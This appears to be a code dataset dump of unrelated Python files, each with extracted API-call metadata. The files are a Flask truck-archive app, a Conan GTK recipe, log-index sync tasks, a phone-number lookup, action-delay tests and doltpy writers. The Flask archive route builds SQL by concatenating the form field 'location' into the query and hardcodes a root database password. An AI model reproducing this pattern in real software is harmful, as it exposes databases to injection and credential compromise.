To, Content, Mail\n'), ((2760, 2810), 'mako.template.Template', 'Template', ([], {'filename': '"""templates/email_response.html"""'}), "(filename='templates/email_response.html')\n", (2768, 2810), False, 'from mako.template import Template\n'), ((3076, 3124), 'falcon.get_http_status', 'falcon.get_http_status', (['err.response.status_code'], {}), '(err.response.status_code)\n', (3098, 3124), False, 'import falcon\n')] |
from flask import Flask, request
from flask import render_template
from flask_mysqldb import MySQL
import TimeCalc
from datetime import datetime, timedelta
app = Flask(__name__)
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'password'
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_DB'] = 'trucks'
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'
mysql = MySQL(app)
@app.route('/', methods=['GET', 'POST'])
def home():
cur = mysql.connection.cursor()
cur.execute('''SELECT * FROM on_site''')
onSite = cur.fetchall()
cur.execute('SELECT time_in, time_out FROM archive WHERE time_in >= DATE_ADD(NOW(), INTERVAL -12 HOUR);')
prevTimes = cur.fetchall()
wait_times = TimeCalc.CalculateWaitTime(prevTimes, onSite)
i = 0
for row in onSite:
wait = wait_times[i]
hours = (wait-datetime.now()).total_seconds() / 3600
temp_dict = {'wait_time' :wait,'time_remaining': hours}
row.update(temp_dict)
i += 1
return render_template('home.html', data=onSite, wait_times=wait_times, curr_time = datetime.now())
@app.route('/archive/', methods=['POST', 'GET'])
def archive():
cur = mysql.connection.cursor()
if request.method == 'POST':
output = request.form['output']
date= request.form['date']
print('DATE IS ')
print(date)
query = 'SELECT * FROM archive '
andStr = ''
whereStr = 'WHERE '
if date !='ALL':
if date == 'yesterday':
query += 'WHERE time_in >= DATE_ADD(NOW(), INTERVAL -1 DAY) '
elif date == 'lastWeek':
query += 'WHERE time_in >= DATE_ADD(NOW(), INTERVAL -7 DAY) '
elif date == 'last3Month':
query += 'WHERE time_in >= DATE_ADD(NOW(), INTERVAL -90 DAY) '
elif date == 'last6Month':
query += 'WHERE time_in >= DATE_ADD(NOW(), INTERVAL -180 DAY) '
elif date == 'lastYear':
query += 'WHERE time_in >= DATE_ADD(NOW(), INTERVAL -365 DAY) '
andStr = 'AND '
whereStr = ''
location = request.form['location']
if location != 'ALL':
query += andStr + whereStr + 'location=' + "'" + location + "'" + ' '
andStr = 'AND '
whereStr = ''
#company = request.form['company']
# if company != 'ALL':
# query += andStr + 'WHERE company = ' + "'" + company + "'"
query += ';'
print(query)
cur.execute(query)
data = cur.fetchall()
displayMode = request.form['output']
if displayMode == 'screen':
return render_template('archive.html', data=data)
return render_template('archive.html', data=None)
| [
"flask.render_template",
"TimeCalc.CalculateWaitTime",
"flask_mysqldb.MySQL",
"flask.Flask",
"datetime.datetime.now"
] | [((163, 178), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (168, 178), False, 'from flask import Flask, request\n'), ((384, 394), 'flask_mysqldb.MySQL', 'MySQL', (['app'], {}), '(app)\n', (389, 394), False, 'from flask_mysqldb import MySQL\n'), ((723, 768), 'TimeCalc.CalculateWaitTime', 'TimeCalc.CalculateWaitTime', (['prevTimes', 'onSite'], {}), '(prevTimes, onSite)\n', (749, 768), False, 'import TimeCalc\n'), ((2803, 2845), 'flask.render_template', 'render_template', (['"""archive.html"""'], {'data': 'None'}), "('archive.html', data=None)\n", (2818, 2845), False, 'from flask import render_template\n'), ((1083, 1097), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1095, 1097), False, 'from datetime import datetime, timedelta\n'), ((2747, 2789), 'flask.render_template', 'render_template', (['"""archive.html"""'], {'data': 'data'}), "('archive.html', data=data)\n", (2762, 2789), False, 'from flask import render_template\n'), ((851, 865), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (863, 865), False, 'from datetime import datetime, timedelta\n')] |
from conans import ConanFile, Meson, tools
from conans.errors import ConanInvalidConfiguration
import os
class LibnameConan(ConanFile):
name = "gtk"
description = "libraries used for creating graphical user interfaces for applications."
topics = ("conan", "gtk", "widgets")
url = "https://github.com/bincrafters/conan-gtk"
homepage = "https://www.gtk.org"
license = "LGPL-2.1-or-later"
generators = "pkg_config"
settings = "os", "arch", "compiler", "build_type"
options = {
"shared": [True, False],
"fPIC": [True, False],
"with_wayland": [True, False],
"with_x11": [True, False],
"with_pango": [True, False]
}
default_options = {
"shared": True,
"fPIC": True,
"with_wayland": False,
"with_x11": True,
"with_pango": True}
_source_subfolder = "source_subfolder"
_build_subfolder = "build_subfolder"
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
if self.settings.os != "Linux":
del self.options.with_wayland
del self.options.with_x11
def build_requirements(self):
self.build_requires("meson/0.56.0")
if not tools.which('pkg-config'):
self.build_requires("pkgconf/1.7.3")
def requirements(self):
self.requires("gdk-pixbuf/2.42.0")
self.requires("glib/2.67.0")
self.requires("cairo/1.17.2")
self.requires("graphene/1.10.2")
if self.settings.os == "Linux":
self.requires("xkbcommon/1.0.3")
if self.options.with_wayland:
self.requires("wayland") # FIXME: Create an actual Wayland package(s)
if self.options.with_x11:
self.requires("xorg/system")
self.requires("libepoxy/1.5.4")
if self.options.with_pango:
self.requires("pango/1.48.0")
def system_requirements(self):
if self.settings.os == 'Linux' and tools.os_info.is_linux:
if tools.os_info.with_apt:
installer = tools.SystemPackageTool()
packages = ['sassc']
for package in packages:
installer.install(package)
def configure(self):
del self.settings.compiler.libcxx
del self.settings.compiler.cppstd
if self.settings.os == "Linux":
if self.options.with_wayland or self.options.with_x11:
if not self.options.with_pango:
raise ConanInvalidConfiguration("with_pango option is mandatory when with_wayland or with_x11 is used")
if self.settings.os == "Windows":
raise ConanInvalidConfiguration("GTK recipe is not yet compatible with Windows. Contributions are welcome.")
def source(self):
tools.get(**self.conan_data["sources"][self.version])
extracted_dir = self.name + "-" + self.version
os.rename(extracted_dir, self._source_subfolder)
def _configure_meson(self):
meson = Meson(self)
defs = {}
if self.settings.os == "Linux":
defs["wayland-backend"] = "true" if self.options.with_wayland else "false"
defs["x11-backend"] = "true" if self.options.with_x11 else "false"
defs["introspection"] = "disabled"
defs["documentation"] = "false"
defs["man-pages"] = "false"
defs["build-tests"] = "false"
defs["build-examples"] = "false"
defs["demos"] = "false"
args=[]
args.append("--wrap-mode=nofallback")
meson.configure(defs=defs, build_folder=self._build_subfolder, source_folder=self._source_subfolder, pkg_config_paths=[self.install_folder], args=args)
return meson
def build(self):
with tools.environment_append(tools.RunEnvironment(self).vars):
meson = self._configure_meson()
meson.build()
def package(self):
self.copy(pattern="LICENSE", dst="licenses", src=self._source_subfolder)
meson = self._configure_meson()
with tools.environment_append({
"PKG_CONFIG_PATH": self.install_folder,
"PATH": [os.path.join(self.package_folder, "bin")]}):
meson.install()
# If the CMakeLists.txt has a proper install method, the steps below may be redundant
# If so, you can just remove the lines below
include_folder = os.path.join(self._source_subfolder, "include")
self.copy(pattern="*", dst="include", src=include_folder)
self.copy(pattern="*.dll", dst="bin", keep_path=False)
self.copy(pattern="*.lib", dst="lib", keep_path=False)
self.copy(pattern="*.a", dst="lib", keep_path=False)
self.copy(pattern="*.so*", dst="lib", keep_path=False)
self.copy(pattern="*.dylib", dst="lib", keep_path=False)
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
self.cpp_info.includedirs.append(os.path.join("include", "gtk-4.0"))
self.cpp_info.names["pkg_config"] = "gtk+-3.0"
if self.settings.os == "Macos":
self.cpp_info.frameworks = ["AppKit", "Carbon"]
| [
"conans.tools.SystemPackageTool",
"os.rename",
"conans.errors.ConanInvalidConfiguration",
"os.path.join",
"conans.tools.get",
"conans.tools.which",
"conans.tools.RunEnvironment",
"conans.tools.collect_libs",
"conans.Meson"
] | [((2848, 2901), 'conans.tools.get', 'tools.get', ([], {}), "(**self.conan_data['sources'][self.version])\n", (2857, 2901), False, 'from conans import ConanFile, Meson, tools\n'), ((2965, 3013), 'os.rename', 'os.rename', (['extracted_dir', 'self._source_subfolder'], {}), '(extracted_dir, self._source_subfolder)\n', (2974, 3013), False, 'import os\n'), ((3063, 3074), 'conans.Meson', 'Meson', (['self'], {}), '(self)\n', (3068, 3074), False, 'from conans import ConanFile, Meson, tools\n'), ((4439, 4486), 'os.path.join', 'os.path.join', (['self._source_subfolder', '"""include"""'], {}), "(self._source_subfolder, 'include')\n", (4451, 4486), False, 'import os\n'), ((4926, 4950), 'conans.tools.collect_libs', 'tools.collect_libs', (['self'], {}), '(self)\n', (4944, 4950), False, 'from conans import ConanFile, Meson, tools\n'), ((1262, 1287), 'conans.tools.which', 'tools.which', (['"""pkg-config"""'], {}), "('pkg-config')\n", (1273, 1287), False, 'from conans import ConanFile, Meson, tools\n'), ((2714, 2826), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['"""GTK recipe is not yet compatible with Windows. Contributions are welcome."""'], {}), "(\n 'GTK recipe is not yet compatible with Windows. Contributions are welcome.'\n )\n", (2739, 2826), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((4992, 5026), 'os.path.join', 'os.path.join', (['"""include"""', '"""gtk-4.0"""'], {}), "('include', 'gtk-4.0')\n", (5004, 5026), False, 'import os\n'), ((2114, 2139), 'conans.tools.SystemPackageTool', 'tools.SystemPackageTool', ([], {}), '()\n', (2137, 2139), False, 'from conans import ConanFile, Meson, tools\n'), ((2556, 2658), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['"""with_pango option is mandatory when with_wayland or with_x11 is used"""'], {}), "(\n 'with_pango option is mandatory when with_wayland or with_x11 is used')\n", (2581, 2658), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((3832, 3858), 'conans.tools.RunEnvironment', 'tools.RunEnvironment', (['self'], {}), '(self)\n', (3852, 3858), False, 'from conans import ConanFile, Meson, tools\n'), ((4194, 4234), 'os.path.join', 'os.path.join', (['self.package_folder', '"""bin"""'], {}), "(self.package_folder, 'bin')\n", (4206, 4234), False, 'import os\n')] |
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-LOG 蓝鲸日志平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-LOG 蓝鲸日志平台 is licensed under the MIT License.
License for BK-LOG 蓝鲸日志平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
We undertake not to change the open source license (MIT license) applicable to the current version of
the project delivered to anyone in the future.
"""
from concurrent.futures import ThreadPoolExecutor
from celery.schedules import crontab
from celery.task import periodic_task, task
from apps.log_search.handlers.search.search_handlers_esquery import SearchHandler
from apps.utils.lock import share_lock
from apps.utils.log import logger
from apps.exceptions import ApiResultError
from apps.log_search.constants import BkDataErrorCode
from apps.log_search.models import LogIndexSet
@periodic_task(run_every=crontab(minute="*/10"))
@share_lock()
def sync_index_set_mapping_cache():
logger.info("[sync_index_set_mapping_cache] start")
index_set_id_list = LogIndexSet.objects.filter(is_active=True).values_list("index_set_id", flat=True)
def sync_mapping_cache(index_set_id):
logger.info("[sync_index_set_mapping_cache] index_set({}) start".format(index_set_id))
try:
SearchHandler(index_set_id=index_set_id, search_dict={}).fields()
except Exception as e: # pylint: disable=broad-except
logger.exception("[sync_index_set_mapping_cache] index_set({}) sync failed: {}".format(index_set_id, e))
return
logger.info("[sync_index_set_mapping_cache] index_set({}) sync success".format(index_set_id))
with ThreadPoolExecutor() as executor:
executor.map(sync_mapping_cache, index_set_id_list)
logger.info("[sync_index_set_mapping_cache] end")
@periodic_task(run_every=crontab(minute="0", hour="2"))
def sync_index_set_mapping_snapshot():
logger.info("[sync_index_set_mapping_snapshot] start")
index_set_list = LogIndexSet.objects.filter(is_active=True)
for index_set in index_set_list:
try:
index_set.sync_fields_snapshot(pre_check_enable=False)
except ApiResultError as e:
# 当数据平台返回为无法获取元数据报错情况
if e.code in [BkDataErrorCode.STORAGE_TYPE_ERROR, BkDataErrorCode.COULD_NOT_GET_METADATA_ERROR]:
index_set.is_active = False
index_set.save()
logger.exception(
f"[sync_index_set_mapping_snapshot] index_set({index_set.index_set_id} call mapping error: {e})"
)
continue
except Exception as e: # pylint: disable=broad-except
logger.exception(
"[sync_index_set_mapping_snapshot] index_set({}) sync failed: {}".format(index_set.index_set_id, e)
)
continue
logger.info("[sync_index_set_mapping_snapshot] index_set({}) sync success".format(index_set.index_set_id))
logger.info("[sync_index_set_mapping_snapshot] end")
@task(ignore_result=True)
def sync_single_index_set_mapping_snapshot(index_set_id=None): # pylint: disable=function-name-too-long
try:
index_set_obj = LogIndexSet.objects.get(index_set_id=index_set_id)
except LogIndexSet.DoesNotExist:
logger.exception(f"[sync_single_index_set_mapping_snapshot]index_set({index_set_id}) not exist")
else:
try:
index_set_obj.sync_fields_snapshot()
except Exception as e: # pylint: disable=broad-except
logger.exception(
f"[sync_single_index_set_mapping_snapshot] index_set({index_set_obj.index_set_id}) sync failed: {e}"
)
logger.info(f"[sync_single_index_set_mapping_snapshot] index_set({index_set_obj.index_set_id}) sync success")
| [
"celery.task.task",
"concurrent.futures.ThreadPoolExecutor",
"apps.log_search.models.LogIndexSet.objects.filter",
"apps.log_search.models.LogIndexSet.objects.get",
"apps.utils.log.logger.exception",
"apps.utils.log.logger.info",
"celery.schedules.crontab",
"apps.log_search.handlers.search.search_handl... | [((1998, 2010), 'apps.utils.lock.share_lock', 'share_lock', ([], {}), '()\n', (2008, 2010), False, 'from apps.utils.lock import share_lock\n'), ((4090, 4114), 'celery.task.task', 'task', ([], {'ignore_result': '(True)'}), '(ignore_result=True)\n', (4094, 4114), False, 'from celery.task import periodic_task, task\n'), ((2051, 2102), 'apps.utils.log.logger.info', 'logger.info', (['"""[sync_index_set_mapping_cache] start"""'], {}), "('[sync_index_set_mapping_cache] start')\n", (2062, 2102), False, 'from apps.utils.log import logger\n'), ((2847, 2896), 'apps.utils.log.logger.info', 'logger.info', (['"""[sync_index_set_mapping_cache] end"""'], {}), "('[sync_index_set_mapping_cache] end')\n", (2858, 2896), False, 'from apps.utils.log import logger\n'), ((2998, 3052), 'apps.utils.log.logger.info', 'logger.info', (['"""[sync_index_set_mapping_snapshot] start"""'], {}), "('[sync_index_set_mapping_snapshot] start')\n", (3009, 3052), False, 'from apps.utils.log import logger\n'), ((3074, 3116), 'apps.log_search.models.LogIndexSet.objects.filter', 'LogIndexSet.objects.filter', ([], {'is_active': '(True)'}), '(is_active=True)\n', (3100, 3116), False, 'from apps.log_search.models import LogIndexSet\n'), ((4034, 4086), 'apps.utils.log.logger.info', 'logger.info', (['"""[sync_index_set_mapping_snapshot] end"""'], {}), "('[sync_index_set_mapping_snapshot] end')\n", (4045, 4086), False, 'from apps.utils.log import logger\n'), ((2749, 2769), 'concurrent.futures.ThreadPoolExecutor', 'ThreadPoolExecutor', ([], {}), '()\n', (2767, 2769), False, 'from concurrent.futures import ThreadPoolExecutor\n'), ((1973, 1995), 'celery.schedules.crontab', 'crontab', ([], {'minute': '"""*/10"""'}), "(minute='*/10')\n", (1980, 1995), False, 'from celery.schedules import crontab\n'), ((2924, 2953), 'celery.schedules.crontab', 'crontab', ([], {'minute': '"""0"""', 'hour': '"""2"""'}), "(minute='0', hour='2')\n", (2931, 2953), False, 'from celery.schedules import crontab\n'), ((4253, 4303), 'apps.log_search.models.LogIndexSet.objects.get', 'LogIndexSet.objects.get', ([], {'index_set_id': 'index_set_id'}), '(index_set_id=index_set_id)\n', (4276, 4303), False, 'from apps.log_search.models import LogIndexSet\n'), ((4750, 4869), 'apps.utils.log.logger.info', 'logger.info', (['f"""[sync_single_index_set_mapping_snapshot] index_set({index_set_obj.index_set_id}) sync success"""'], {}), "(\n f'[sync_single_index_set_mapping_snapshot] index_set({index_set_obj.index_set_id}) sync success'\n )\n", (4761, 4869), False, 'from apps.utils.log import logger\n'), ((2127, 2169), 'apps.log_search.models.LogIndexSet.objects.filter', 'LogIndexSet.objects.filter', ([], {'is_active': '(True)'}), '(is_active=True)\n', (2153, 2169), False, 'from apps.log_search.models import LogIndexSet\n'), ((4349, 4455), 'apps.utils.log.logger.exception', 'logger.exception', (['f"""[sync_single_index_set_mapping_snapshot]index_set({index_set_id}) not exist"""'], {}), "(\n f'[sync_single_index_set_mapping_snapshot]index_set({index_set_id}) not exist'\n )\n", (4365, 4455), False, 'from apps.utils.log import logger\n'), ((3503, 3627), 'apps.utils.log.logger.exception', 'logger.exception', (['f"""[sync_index_set_mapping_snapshot] index_set({index_set.index_set_id} call mapping error: {e})"""'], {}), "(\n f'[sync_index_set_mapping_snapshot] index_set({index_set.index_set_id} call mapping error: {e})'\n )\n", (3519, 3627), False, 'from apps.utils.log import logger\n'), ((4593, 4721), 'apps.utils.log.logger.exception', 'logger.exception', (['f"""[sync_single_index_set_mapping_snapshot] index_set({index_set_obj.index_set_id}) sync failed: {e}"""'], {}), "(\n f'[sync_single_index_set_mapping_snapshot] index_set({index_set_obj.index_set_id}) sync failed: {e}'\n )\n", (4609, 4721), False, 'from apps.utils.log import logger\n'), ((2372, 2428), 'apps.log_search.handlers.search.search_handlers_esquery.SearchHandler', 'SearchHandler', ([], {'index_set_id': 'index_set_id', 'search_dict': '{}'}), '(index_set_id=index_set_id, search_dict={})\n', (2385, 2428), False, 'from apps.log_search.handlers.search.search_handlers_esquery import SearchHandler\n')] |
import phonenumbers
from phonenumbers import geocoder
phone = input('type phone number format(+551100000000): ')
phone_number = phonenumbers.parse(phone)
print(geocoder.description_for_number(phone_number, 'pt'))
| [
"phonenumbers.parse",
"phonenumbers.geocoder.description_for_number"
] | [((130, 155), 'phonenumbers.parse', 'phonenumbers.parse', (['phone'], {}), '(phone)\n', (148, 155), False, 'import phonenumbers\n'), ((163, 214), 'phonenumbers.geocoder.description_for_number', 'geocoder.description_for_number', (['phone_number', '"""pt"""'], {}), "(phone_number, 'pt')\n", (194, 214), False, 'from phonenumbers import geocoder\n')] |
# Copyright (c) 2020, <NAME>, Honda Research Institute Europe GmbH, and
# Technical University of Darmstadt.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of <NAME>, Honda Research Institute Europe GmbH,
# or Technical University of Darmstadt, nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <NAME>, HONDA RESEARCH INSTITUTE EUROPE GMBH,
# OR TECHNICAL UNIVERSITY OF DARMSTADT BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import numpy as np
import pytest
from pyrado.spaces.box import BoxSpace
from pyrado.environment_wrappers.action_delay import ActDelayWrapper
from tests.environment_wrappers.mock_env import MockEnv
@pytest.mark.wrapper
def test_no_delay():
mockenv = MockEnv(act_space=BoxSpace(-1, 1, shape=(2,)))
wenv = ActDelayWrapper(mockenv, delay=0)
# Reset to initialize buffer
wenv.reset()
# Perform some actions
wenv.step(np.array([4, 1]))
assert mockenv.last_act == [4, 1]
wenv.step(np.array([7, 5]))
assert mockenv.last_act == [7, 5]
@pytest.mark.wrapper
def test_act_delay():
mockenv = MockEnv(act_space=BoxSpace(-1, 1, shape=(2,)))
wenv = ActDelayWrapper(mockenv, delay=2)
# Reset to initialize buffer
wenv.reset()
# Perform some actions
wenv.step(np.array([0, 1]))
assert mockenv.last_act == [0, 0]
wenv.step(np.array([2, 4]))
assert mockenv.last_act == [0, 0]
wenv.step(np.array([1, 2]))
assert mockenv.last_act == [0, 1]
wenv.step(np.array([2, 3]))
assert mockenv.last_act == [2, 4]
@pytest.mark.wrapper
def test_reset():
mockenv = MockEnv(act_space=BoxSpace(-1, 1, shape=(2,)))
wenv = ActDelayWrapper(mockenv, delay=1)
# Reset to initialize buffer
wenv.reset()
# Perform some actions
wenv.step(np.array([0, 4]))
assert mockenv.last_act == [0, 0]
wenv.step(np.array([4, 4]))
assert mockenv.last_act == [0, 4]
# The next action would be [4, 4], but now we reset again
wenv.reset()
wenv.step(np.array([1, 2]))
assert mockenv.last_act == [0, 0]
wenv.step(np.array([2, 3]))
assert mockenv.last_act == [1, 2]
@pytest.mark.wrapper
def test_domain_param():
mockenv = MockEnv(act_space=BoxSpace(-1, 1, shape=(2,)))
wenv = ActDelayWrapper(mockenv, delay=1)
# Reset to initialize buffer
wenv.reset()
# Perform some actions
wenv.step(np.array([0, 1]))
assert mockenv.last_act == [0, 0]
wenv.step(np.array([2, 4]))
assert mockenv.last_act == [0, 1]
# change the delay and reset
wenv.domain_param = {"act_delay": 2}
wenv.reset()
wenv.step(np.array([1, 2]))
assert mockenv.last_act == [0, 0]
wenv.step(np.array([2, 3]))
assert mockenv.last_act == [0, 0]
wenv.step(np.array([8, 9]))
assert mockenv.last_act == [1, 2]
| [
"numpy.array",
"pyrado.spaces.box.BoxSpace",
"pyrado.environment_wrappers.action_delay.ActDelayWrapper"
] | [((2046, 2079), 'pyrado.environment_wrappers.action_delay.ActDelayWrapper', 'ActDelayWrapper', (['mockenv'], {'delay': '(0)'}), '(mockenv, delay=0)\n', (2061, 2079), False, 'from pyrado.environment_wrappers.action_delay import ActDelayWrapper\n'), ((2416, 2449), 'pyrado.environment_wrappers.action_delay.ActDelayWrapper', 'ActDelayWrapper', (['mockenv'], {'delay': '(2)'}), '(mockenv, delay=2)\n', (2431, 2449), False, 'from pyrado.environment_wrappers.action_delay import ActDelayWrapper\n'), ((2922, 2955), 'pyrado.environment_wrappers.action_delay.ActDelayWrapper', 'ActDelayWrapper', (['mockenv'], {'delay': '(1)'}), '(mockenv, delay=1)\n', (2937, 2955), False, 'from pyrado.environment_wrappers.action_delay import ActDelayWrapper\n'), ((3516, 3549), 'pyrado.environment_wrappers.action_delay.ActDelayWrapper', 'ActDelayWrapper', (['mockenv'], {'delay': '(1)'}), '(mockenv, delay=1)\n', (3531, 3549), False, 'from pyrado.environment_wrappers.action_delay import ActDelayWrapper\n'), ((2173, 2189), 'numpy.array', 'np.array', (['[4, 1]'], {}), '([4, 1])\n', (2181, 2189), True, 'import numpy as np\n'), ((2243, 2259), 'numpy.array', 'np.array', (['[7, 5]'], {}), '([7, 5])\n', (2251, 2259), True, 'import numpy as np\n'), ((2543, 2559), 'numpy.array', 'np.array', (['[0, 1]'], {}), '([0, 1])\n', (2551, 2559), True, 'import numpy as np\n'), ((2613, 2629), 'numpy.array', 'np.array', (['[2, 4]'], {}), '([2, 4])\n', (2621, 2629), True, 'import numpy as np\n'), ((2683, 2699), 'numpy.array', 'np.array', (['[1, 2]'], {}), '([1, 2])\n', (2691, 2699), True, 'import numpy as np\n'), ((2753, 2769), 'numpy.array', 'np.array', (['[2, 3]'], {}), '([2, 3])\n', (2761, 2769), True, 'import numpy as np\n'), ((3049, 3065), 'numpy.array', 'np.array', (['[0, 4]'], {}), '([0, 4])\n', (3057, 3065), True, 'import numpy as np\n'), ((3119, 3135), 'numpy.array', 'np.array', (['[4, 4]'], {}), '([4, 4])\n', (3127, 3135), True, 'import numpy as np\n'), ((3270, 3286), 'numpy.array', 'np.array', (['[1, 2]'], {}), '([1, 2])\n', (3278, 3286), True, 'import numpy as np\n'), ((3340, 3356), 'numpy.array', 'np.array', (['[2, 3]'], {}), '([2, 3])\n', (3348, 3356), True, 'import numpy as np\n'), ((3643, 3659), 'numpy.array', 'np.array', (['[0, 1]'], {}), '([0, 1])\n', (3651, 3659), True, 'import numpy as np\n'), ((3713, 3729), 'numpy.array', 'np.array', (['[2, 4]'], {}), '([2, 4])\n', (3721, 3729), True, 'import numpy as np\n'), ((3876, 3892), 'numpy.array', 'np.array', (['[1, 2]'], {}), '([1, 2])\n', (3884, 3892), True, 'import numpy as np\n'), ((3946, 3962), 'numpy.array', 'np.array', (['[2, 3]'], {}), '([2, 3])\n', (3954, 3962), True, 'import numpy as np\n'), ((4016, 4032), 'numpy.array', 'np.array', (['[8, 9]'], {}), '([8, 9])\n', (4024, 4032), True, 'import numpy as np\n'), ((2006, 2033), 'pyrado.spaces.box.BoxSpace', 'BoxSpace', (['(-1)', '(1)'], {'shape': '(2,)'}), '(-1, 1, shape=(2,))\n', (2014, 2033), False, 'from pyrado.spaces.box import BoxSpace\n'), ((2376, 2403), 'pyrado.spaces.box.BoxSpace', 'BoxSpace', (['(-1)', '(1)'], {'shape': '(2,)'}), '(-1, 1, shape=(2,))\n', (2384, 2403), False, 'from pyrado.spaces.box import BoxSpace\n'), ((2882, 2909), 'pyrado.spaces.box.BoxSpace', 'BoxSpace', (['(-1)', '(1)'], {'shape': '(2,)'}), '(-1, 1, shape=(2,))\n', (2890, 2909), False, 'from pyrado.spaces.box import BoxSpace\n'), ((3476, 3503), 'pyrado.spaces.box.BoxSpace', 'BoxSpace', (['(-1)', '(1)'], {'shape': '(2,)'}), '(-1, 1, shape=(2,))\n', (3484, 3503), False, 'from pyrado.spaces.box import BoxSpace\n')] |
import csv
import datetime
import io
import logging
import os
import tempfile
from typing import Any, Callable, List, Mapping, Optional, Set
import pandas as pd # type: ignore
from doltpy.cli import Dolt
from doltpy.shared.helpers import columns_to_rows
logger = logging.getLogger(__name__)
CREATE, FORCE_CREATE, REPLACE, UPDATE = "create", "force_create", "replace", "update"
IMPORT_MODES_TO_FLAGS = {
CREATE: ["-c"],
FORCE_CREATE: ["-f", "-c"],
REPLACE: ["-r"],
UPDATE: ["-u"],
}
def write_file(
dolt: Dolt,
table: str,
file_handle: io.StringIO,
# TODO what to do about this?
filetype: str = "csv",
import_mode: Optional[str] = None,
primary_key: Optional[List[str]] = None,
commit: Optional[bool] = False,
commit_message: Optional[str] = None,
commit_date: Optional[datetime.datetime] = None,
):
def writer(filepath: str):
with open(filepath, "w") as f:
f.writelines(file_handle.readlines())
_import_helper(
dolt=dolt,
table=table,
write_import_file=writer,
primary_key=primary_key,
import_mode=import_mode,
commit=commit,
commit_message=commit_message,
commit_date=commit_date,
)
def write_columns(
dolt: Dolt,
table: str,
columns: Mapping[str, List[Any]],
import_mode: Optional[str] = None,
primary_key: Optional[List[str]] = None,
commit: Optional[bool] = False,
commit_message: Optional[str] = None,
commit_date: Optional[datetime.datetime] = None,
):
"""
:param dolt:
:param table:
:param columns:
:param import_mode:
:param primary_key:
:param commit:
:param commit_message:
:param commit_date:
:return:
"""
def writer(filepath: str):
if len(list(set(len(col) for col in columns.values()))) != 1:
raise ValueError("Must pass columns of identical length")
with open(filepath, "w") as f:
csv_writer = csv.DictWriter(f, columns.keys())
rows = columns_to_rows(columns)
csv_writer.writeheader()
csv_writer.writerows(rows)
_import_helper(
dolt=dolt,
table=table,
write_import_file=writer,
primary_key=primary_key,
import_mode=import_mode,
commit=commit,
commit_message=commit_message,
commit_date=commit_date,
)
def write_rows(
dolt: Dolt,
table: str,
rows: List[dict],
import_mode: Optional[str] = None,
primary_key: Optional[List[str]] = None,
commit: Optional[bool] = False,
commit_message: Optional[str] = None,
commit_date: Optional[datetime.datetime] = None,
):
"""
:param dolt:
:param table:
:param rows:
:param import_mode:
:param primary_key:
:param commit:
:param commit_message:
:param commit_date:
:return:
"""
def writer(filepath: str):
with open(filepath, "w") as f:
fieldnames: Set[str] = set()
for row in rows:
fieldnames = fieldnames.union(set(row.keys()))
csv_writer = csv.DictWriter(f, fieldnames)
csv_writer.writeheader()
csv_writer.writerows(rows)
_import_helper(
dolt=dolt,
table=table,
write_import_file=writer,
primary_key=primary_key,
import_mode=import_mode,
commit=commit,
commit_message=commit_message,
commit_date=commit_date,
)
def write_pandas(
dolt: Dolt,
table: str,
df: pd.DataFrame,
import_mode: Optional[str] = None,
primary_key: Optional[List[str]] = None,
commit: Optional[bool] = False,
commit_message: Optional[str] = None,
commit_date: Optional[datetime.datetime] = None,
):
"""
:param dolt:
:param table:
:param df:
:param import_mode:
:param primary_key:
:param commit:
:param commit_message:
:param commit_date:
:return:
"""
def writer(filepath: str):
